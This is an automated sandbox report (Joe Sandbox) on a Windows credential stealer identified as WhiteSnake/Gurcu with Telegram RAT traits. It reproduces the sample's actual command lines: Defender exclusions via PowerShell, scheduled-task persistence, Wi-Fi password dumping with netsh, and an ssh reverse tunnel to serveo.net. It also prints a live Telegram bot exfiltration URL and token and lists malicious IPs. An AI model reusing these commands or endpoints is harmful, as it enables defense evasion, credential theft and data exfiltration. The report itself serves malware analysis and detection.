Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
jqOHOuPMJP.exe

Overview

General Information

Sample name:jqOHOuPMJP.exe
renamed because original name is a hash value
Original sample name:7e9a93c69aecfc2bbda9470fbd4556db.exe
Analysis ID:1390172
MD5:7e9a93c69aecfc2bbda9470fbd4556db
SHA1:ab0e810472a897affac1a761b49595939f6897a9
SHA256:82e68bb4f56181a0b2458f2861aa7b5fa1bb0f4ce30907d579c3b92707ef2647
Tags:exeWhiteSnakeStealer
Infos:

Detection

Gurcu Stealer, WhiteSnake Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Sigma detected: Capture Wi-Fi password
Yara detected Gurcu Stealer
Yara detected Telegram RAT
Yara detected WhiteSnake Stealer
Adds a directory exclusion to Windows Defender
Disables UAC (registry)
Found many strings related to Crypto-Wallets (likely being stolen)
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal WLAN passwords
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses netsh to modify the Windows network and firewall settings
Uses schtasks.exe or at.exe to add and modify task schedules
Uses the Telegram API (likely for C&C communication)
Yara detected Generic Downloader
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Communication To Uncommon Destination Ports
Sigma detected: Port Forwarding Activity Via SSH.EXE
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Schtasks From Env Var Folder
Tries to load missing DLLs
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer

Classification

Process Tree

  • System is w10x64
  • jqOHOuPMJP.exe (PID: 6780 cmdline: C:\Users\user\Desktop\jqOHOuPMJP.exe MD5: 7E9A93C69AECFC2BBDA9470FBD4556DB)
    • powershell.exe (PID: 1516 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\jqOHOuPMJP.exe'; Add-MpPreference -ExclusionProcess 'jqOHOuPMJP'; Add-MpPreference -ExclusionPath 'C:\Windows'; Add-MpPreference -ExclusionPath 'C:\Users\user' MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 4176 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 7216 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • vkefq4cv.oil.exe (PID: 7316 cmdline: "C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe" MD5: 869F82DF0992DC2F5155D8F69FD1C9CF)
      • cmd.exe (PID: 7420 cmdline: C:\Windows\System32\cmd.exe" /C chcp 65001 && timeout /t 3 > NUL && schtasks /create /tn "vkefq4cv.oil" /sc MINUTE /tr "C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe" /rl HIGHEST /f && DEL /F /S /Q /A "C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe" &&START "" "C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7432 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • chcp.com (PID: 7468 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
        • timeout.exe (PID: 7484 cmdline: timeout /t 3 MD5: 100065E21CFBBDE57CBA2838921F84D6)
        • schtasks.exe (PID: 7600 cmdline: schtasks /create /tn "vkefq4cv.oil" /sc MINUTE /tr "C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
        • vkefq4cv.oil.exe (PID: 7620 cmdline: "C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe" MD5: 869F82DF0992DC2F5155D8F69FD1C9CF)
          • cmd.exe (PID: 7776 cmdline: cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ] MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7876 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • chcp.com (PID: 7988 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
            • netsh.exe (PID: 8008 cmdline: netsh wlan show profiles MD5: 6F1E6DD688818BC3D1391D0CC7D597EB)
            • findstr.exe (PID: 8020 cmdline: findstr /R /C:"[ ]:[ ]" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5)
          • cmd.exe (PID: 8064 cmdline: cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid | findstr "SSID BSSID Signal MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 8080 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • chcp.com (PID: 8116 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
            • netsh.exe (PID: 8148 cmdline: netsh wlan show networks mode=bssid MD5: 6F1E6DD688818BC3D1391D0CC7D597EB)
            • findstr.exe (PID: 8156 cmdline: findstr "SSID BSSID Signal" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5)
          • ssh.exe (PID: 4548 cmdline: "ssh.exe" -o "StrictHostKeyChecking=no" -R 80:127.0.0.1:6787 serveo.net MD5: C05426E6F6DFB30FB78FBA874A2FF7DC)
            • conhost.exe (PID: 2088 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • vkefq4cv.oil.exe (PID: 8072 cmdline: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe MD5: 869F82DF0992DC2F5155D8F69FD1C9CF)
    • cmd.exe (PID: 1196 cmdline: cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ] MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7360 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • chcp.com (PID: 2084 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
      • netsh.exe (PID: 2004 cmdline: netsh wlan show profiles MD5: 6F1E6DD688818BC3D1391D0CC7D597EB)
      • findstr.exe (PID: 6344 cmdline: findstr /R /C:"[ ]:[ ]" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5)
    • cmd.exe (PID: 6544 cmdline: cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid | findstr "SSID BSSID Signal MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 1184 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • chcp.com (PID: 7384 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
      • netsh.exe (PID: 7316 cmdline: netsh wlan show networks mode=bssid MD5: 6F1E6DD688818BC3D1391D0CC7D597EB)
      • findstr.exe (PID: 7500 cmdline: findstr "SSID BSSID Signal" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5)
    • ssh.exe (PID: 7440 cmdline: "ssh.exe" -o "StrictHostKeyChecking=no" -R 80:127.0.0.1:6787 serveo.net MD5: C05426E6F6DFB30FB78FBA874A2FF7DC)
      • conhost.exe (PID: 7648 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • WerFault.exe (PID: 1800 cmdline: C:\Windows\system32\WerFault.exe -u -p 8072 -s 1632 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
  • vkefq4cv.oil.exe (PID: 7712 cmdline: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe MD5: 869F82DF0992DC2F5155D8F69FD1C9CF)
  • vkefq4cv.oil.exe (PID: 125704 cmdline: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe MD5: 869F82DF0992DC2F5155D8F69FD1C9CF)
  • vkefq4cv.oil.exe (PID: 325468 cmdline: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe MD5: 869F82DF0992DC2F5155D8F69FD1C9CF)
  • vkefq4cv.oil.exe (PID: 491576 cmdline: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe MD5: 869F82DF0992DC2F5155D8F69FD1C9CF)
  • cleanup

Malware Configuration

Threatname: Telegram RAT

{"C2 url": "https://api.telegram.org/bot6352251597:AAF6uxZ1z4xhnUTnQP5u36WV5EeOgP0W_YY/sendMessage"}

Threatname: Gurcu Stealer

{"Exfil Mode": "Telegram", "Telegram URL": "https://api.telegram.org/bot6352251597:AAF6uxZ1z4xhnUTnQP5u36WV5EeOgP0W_YY/sendMessage?chat_id=5169773349"}

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exeJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
    C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      0000002D.00000002.3553295709.00000167D1889000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_GurcuStealerYara detected Gurcu StealerJoe Security
        0000002C.00000002.2953825020.000001EC01AD9000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_GurcuStealerYara detected Gurcu StealerJoe Security
          00000012.00000002.2064616867.0000010DD73F1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            0000000B.00000002.4118051146.000001B8AB951000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_GurcuStealerYara detected Gurcu StealerJoe Security
                Click to see the 10 entries

                Unpacked PEs

                SourceRuleDescriptionAuthorStrings
                0.2.jqOHOuPMJP.exe.3e4a9f8.0.raw.unpackJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security

                  Sigma Signatures

                  System Summary

                  barindex
                  Sigma detected: Invoke-Obfuscation CLIP+ Launcher
                  Source: Process startedAuthor: Jonathan Cheong, oscd.community: Data: Command: C:\Windows\System32\cmd.exe" /C chcp 65001 && timeout /t 3 > NUL && schtasks /create /tn "vkefq4cv.oil" /sc MINUTE /tr "C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe" /rl HIGHEST /f && DEL /F /S /Q /A "C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe" &&START "" "C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe, CommandLine: C:\Windows\System32\cmd.exe" /C chcp 65001 && timeout /t 3 > NUL && schtasks /create /tn "vkefq4cv.oil" /sc MINUTE /tr "C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe" /rl HIGHEST /f && DEL /F /S /Q /A "C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe" &&START "" "C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe, ParentProcessId: 7316, ParentProcessName: vkefq4cv.oil.exe, ProcessCommandLine: C:\Windows\System32\cmd.exe" /C chcp 65001 && timeout /t 3 > NUL && schtasks /create /tn "vkefq4cv.oil" /sc MINUTE /tr "C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe" /rl HIGHEST /f && DEL /F /S /Q /A "C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe" &&START "" "C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe, ProcessId: 7420, ProcessName: cmd.exe
                  Sigma detected: Invoke-Obfuscation VAR+ Launcher
                  Source: Process startedAuthor: Jonathan Cheong, oscd.community: Data: Command: C:\Windows\System32\cmd.exe" /C chcp 65001 && timeout /t 3 > NUL && schtasks /create /tn "vkefq4cv.oil" /sc MINUTE /tr "C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe" /rl HIGHEST /f && DEL /F /S /Q /A "C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe" &&START "" "C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe, CommandLine: C:\Windows\System32\cmd.exe" /C chcp 65001 && timeout /t 3 > NUL && schtasks /create /tn "vkefq4cv.oil" /sc MINUTE /tr "C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe" /rl HIGHEST /f && DEL /F /S /Q /A "C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe" &&START "" "C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe, ParentProcessId: 7316, ParentProcessName: vkefq4cv.oil.exe, ProcessCommandLine: C:\Windows\System32\cmd.exe" /C chcp 65001 && timeout /t 3 > NUL && schtasks /create /tn "vkefq4cv.oil" /sc MINUTE /tr "C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe" /rl HIGHEST /f && DEL /F /S /Q /A "C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe" &&START "" "C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe, ProcessId: 7420, ProcessName: cmd.exe
                  Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\jqOHOuPMJP.exe'; Add-MpPreference -ExclusionProcess 'jqOHOuPMJP'; Add-MpPreference -ExclusionPath 'C:\Windows'; Add-MpPreference -ExclusionPath 'C:\Users\user', CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\jqOHOuPMJP.exe'; Add-MpPreference -ExclusionProcess 'jqOHOuPMJP'; Add-MpPreference -ExclusionPath 'C:\Windows'; Add-MpPreference -ExclusionPath 'C:\Users\user', CommandLine|base64offset|contains: &, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Users\user\Desktop\jqOHOuPMJP.exe, ParentImage: C:\Users\user\Desktop\jqOHOuPMJP.exe, ParentProcessId: 6780, ParentProcessName: jqOHOuPMJP.exe, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\jqOHOuPMJP.exe'; Add-MpPreference -ExclusionProcess 'jqOHOuPMJP'; Add-MpPreference -ExclusionPath 'C:\Windows'; Add-MpPreference -ExclusionPath 'C:\Users\user', ProcessId: 1516, ProcessName: powershell.exe
                  Sigma detected: Communication To Uncommon Destination Ports
                  Source: Network ConnectionAuthor: Florian Roth (Nextron Systems): Data: DestinationIp: 185.119.118.59, DestinationIsIpv6: false, DestinationPort: 8080, EventID: 3, Image: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe, Initiated: true, ProcessId: 7620, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49738
                  Sigma detected: Port Forwarding Activity Via SSH.EXE
                  Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: "ssh.exe" -o "StrictHostKeyChecking=no" -R 80:127.0.0.1:6787 serveo.net, CommandLine: "ssh.exe" -o "StrictHostKeyChecking=no" -R 80:127.0.0.1:6787 serveo.net, CommandLine|base64offset|contains: , Image: C:\Windows\System32\OpenSSH\ssh.exe, NewProcessName: C:\Windows\System32\OpenSSH\ssh.exe, OriginalFileName: C:\Windows\System32\OpenSSH\ssh.exe, ParentCommandLine: "C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe" , ParentImage: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe, ParentProcessId: 7620, ParentProcessName: vkefq4cv.oil.exe, ProcessCommandLine: "ssh.exe" -o "StrictHostKeyChecking=no" -R 80:127.0.0.1:6787 serveo.net, ProcessId: 4548, ProcessName: ssh.exe
                  Sigma detected: Powershell Defender Exclusion
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\jqOHOuPMJP.exe'; Add-MpPreference -ExclusionProcess 'jqOHOuPMJP'; Add-MpPreference -ExclusionPath 'C:\Windows'; Add-MpPreference -ExclusionPath 'C:\Users\user', CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\jqOHOuPMJP.exe'; Add-MpPreference -ExclusionProcess 'jqOHOuPMJP'; Add-MpPreference -ExclusionPath 'C:\Windows'; Add-MpPreference -ExclusionPath 'C:\Users\user', CommandLine|base64offset|contains: &, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Users\user\Desktop\jqOHOuPMJP.exe, ParentImage: C:\Users\user\Desktop\jqOHOuPMJP.exe, ParentProcessId: 6780, ParentProcessName: jqOHOuPMJP.exe, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\jqOHOuPMJP.exe'; Add-MpPreference -ExclusionProcess 'jqOHOuPMJP'; Add-MpPreference -ExclusionPath 'C:\Windows'; Add-MpPreference -ExclusionPath 'C:\Users\user', ProcessId: 1516, ProcessName: powershell.exe
                  Sigma detected: Suspicious Schtasks From Env Var Folder
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: schtasks /create /tn "vkefq4cv.oil" /sc MINUTE /tr "C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe" /rl HIGHEST /f , CommandLine: schtasks /create /tn "vkefq4cv.oil" /sc MINUTE /tr "C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe" /rl HIGHEST /f , CommandLine|base64offset|contains: mj,, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: C:\Windows\System32\cmd.exe" /C chcp 65001 && timeout /t 3 > NUL && schtasks /create /tn "vkefq4cv.oil" /sc MINUTE /tr "C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe" /rl HIGHEST /f && DEL /F /S /Q /A "C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe" &&START "" "C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7420, ParentProcessName: cmd.exe, ProcessCommandLine: schtasks /create /tn "vkefq4cv.oil" /sc MINUTE /tr "C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe" /rl HIGHEST /f , ProcessId: 7600, ProcessName: schtasks.exe
                  Sigma detected: Non Interactive PowerShell Process Spawned
                  Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\jqOHOuPMJP.exe'; Add-MpPreference -ExclusionProcess 'jqOHOuPMJP'; Add-MpPreference -ExclusionPath 'C:\Windows'; Add-MpPreference -ExclusionPath 'C:\Users\user', CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\jqOHOuPMJP.exe'; Add-MpPreference -ExclusionProcess 'jqOHOuPMJP'; Add-MpPreference -ExclusionPath 'C:\Windows'; Add-MpPreference -ExclusionPath 'C:\Users\user', CommandLine|base64offset|contains: &, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Users\user\Desktop\jqOHOuPMJP.exe, ParentImage: C:\Users\user\Desktop\jqOHOuPMJP.exe, ParentProcessId: 6780, ParentProcessName: jqOHOuPMJP.exe, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\jqOHOuPMJP.exe'; Add-MpPreference -ExclusionProcess 'jqOHOuPMJP'; Add-MpPreference -ExclusionPath 'C:\Windows'; Add-MpPreference -ExclusionPath 'C:\Users\user', ProcessId: 1516, ProcessName: powershell.exe

                  Stealing of Sensitive Information

                  barindex
                  Sigma detected: Capture Wi-Fi password
                  Source: Process startedAuthor: Joe Security: Data: Command: cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ], CommandLine: cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ], CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe" , ParentImage: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe, ParentProcessId: 7620, ParentProcessName: vkefq4cv.oil.exe, ProcessCommandLine: cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ], ProcessId: 7776, ProcessName: cmd.exe

                  Snort Signatures

                  No Snort rule has matched

                  Joe Sandbox Signatures

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Antivirus detection for URL or domain
                  Source: http://pesterbdd.com/images/Pester.pngURL Reputation: Label: malware
                  Source: http://216.250.190.139:80Avira URL Cloud: Label: malware
                  Source: https://192.99.196.191:443Avira URL Cloud: Label: malware
                  Source: http://66.42.56.128:80Avira URL Cloud: Label: malware
                  Source: http://82.147.85.194/byte/@jokerbot880901.txtAvira URL Cloud: Label: malware
                  Source: http://185.217.98.121:80Avira URL Cloud: Label: malware
                  Source: https://44.228.161.50:443Avira URL Cloud: Label: malware
                  Source: https://164.90.185.9:443Avira URL Cloud: Label: malware
                  Source: http://18.228.80.130:80Avira URL Cloud: Label: malware
                  Source: http://185.217.98.121:8080Avira URL Cloud: Label: malware
                  Source: http://pesterbdd.com/i?Avira URL Cloud: Label: malware
                  Source: http://82.147.85.194/byte/Avira URL Cloud: Label: malware
                  Source: https://185.217.98.121:443Avira URL Cloud: Label: malware
                  Source: http://116.202.101.219:8080Avira URL Cloud: Label: malware
                  Source: http://206.189.109.146:80Avira URL Cloud: Label: malware
                  Found malware configuration
                  Source: vkefq4cv.oil.exe.8072.18.memstrminMalware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot6352251597:AAF6uxZ1z4xhnUTnQP5u36WV5EeOgP0W_YY/sendMessage"}
                  Source: vkefq4cv.oil.exe.8072.18.memstrminMalware Configuration Extractor: Gurcu Stealer {"Exfil Mode": "Telegram", "Telegram URL": "https://api.telegram.org/bot6352251597:AAF6uxZ1z4xhnUTnQP5u36WV5EeOgP0W_YY/sendMessage?chat_id=5169773349"}
                  Multi AV Scanner detection for domain / URL
                  Source: serveo.netVirustotal: Detection: 7%Perma Link
                  Source: http://216.250.190.139:80Virustotal: Detection: 7%Perma Link
                  Source: http://193.142.58.127:80Virustotal: Detection: 6%Perma Link
                  Source: http://66.42.56.128:80Virustotal: Detection: 8%Perma Link
                  Source: http://185.217.98.121:80Virustotal: Detection: 15%Perma Link
                  Source: https://164.90.185.9:443Virustotal: Detection: 8%Perma Link
                  Source: http://18.228.80.130:80Virustotal: Detection: 10%Perma Link
                  Source: http://185.217.98.121:8080Virustotal: Detection: 11%Perma Link
                  Multi AV Scanner detection for submitted file
                  Source: jqOHOuPMJP.exeReversingLabs: Detection: 13%
                  Source: jqOHOuPMJP.exeVirustotal: Detection: 24%Perma Link
                  Machine Learning detection for dropped file
                  Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exeJoe Sandbox ML: detected
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeJoe Sandbox ML: detected
                  Machine Learning detection for sample
                  Source: jqOHOuPMJP.exeJoe Sandbox ML: detected
                  Sample uses string decryption to hide its real strings
                  Source: 0.2.jqOHOuPMJP.exe.3e4a9f8.0.raw.unpackString decryptor: >{tnnsqc7~br
                  Source: 0.2.jqOHOuPMJP.exe.3e4a9f8.0.raw.unpackString decryptor: >tyy`ejj/euh5tx,r
                  Source: 0.2.jqOHOuPMJP.exe.3e4a9f8.0.raw.unpackString decryptor: 9s{tgd}b}~yr
                  Source: 0.2.jqOHOuPMJP.exe.3e4a9f8.0.raw.unpackString decryptor: ,yqdr,j!)/$"+}$#.~!%-$'-,+rzy"$xz&'),##z)wr.-#
                  Source: 0.2.jqOHOuPMJP.exe.3e4a9f8.0.raw.unpackString decryptor: fn{m8Gq}pjjf"gw~f+~~kg}{
                  Source: 0.2.jqOHOuPMJP.exe.3e4a9f8.0.raw.unpackString decryptor: jkK\k
                  Source: 0.2.jqOHOuPMJP.exe.3e4a9f8.0.raw.unpackString decryptor: -{whzMWg1sq&G
                  Source: 0.2.jqOHOuPMJP.exe.3e4a9f8.0.raw.unpackString decryptor: fbnu8ci*OJ ~{~t
                  Source: 0.2.jqOHOuPMJP.exe.3e4a9f8.0.raw.unpackString decryptor: faww8i}fpkdmmjq
                  Source: 0.2.jqOHOuPMJP.exe.3e4a9f8.0.raw.unpackString decryptor: 3&k-m88"+89"+8:"+
                  Source: 0.2.jqOHOuPMJP.exe.3e4a9f8.0.raw.unpackString decryptor: .dylpGul=`hz#o}
                  Source: 0.2.jqOHOuPMJP.exe.3e4a9f8.0.raw.unpackString decryptor: flq8JSNR[YPQ
                  Source: 0.2.jqOHOuPMJP.exe.3e4a9f8.0.raw.unpackString decryptor: 88r`bE:~!ba}<}!pvvfs|1~q9o{d(us8:>!sme`''ml29o)r,c|}!|!vqr:
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeCode function: 11_2_00007FFD9B9784B1 CryptUnprotectData,
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeCode function: 11_2_00007FFD9B9785FD CryptUnprotectData,
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeCode function: 18_2_00007FFD9B9784A1 CryptUnprotectData,
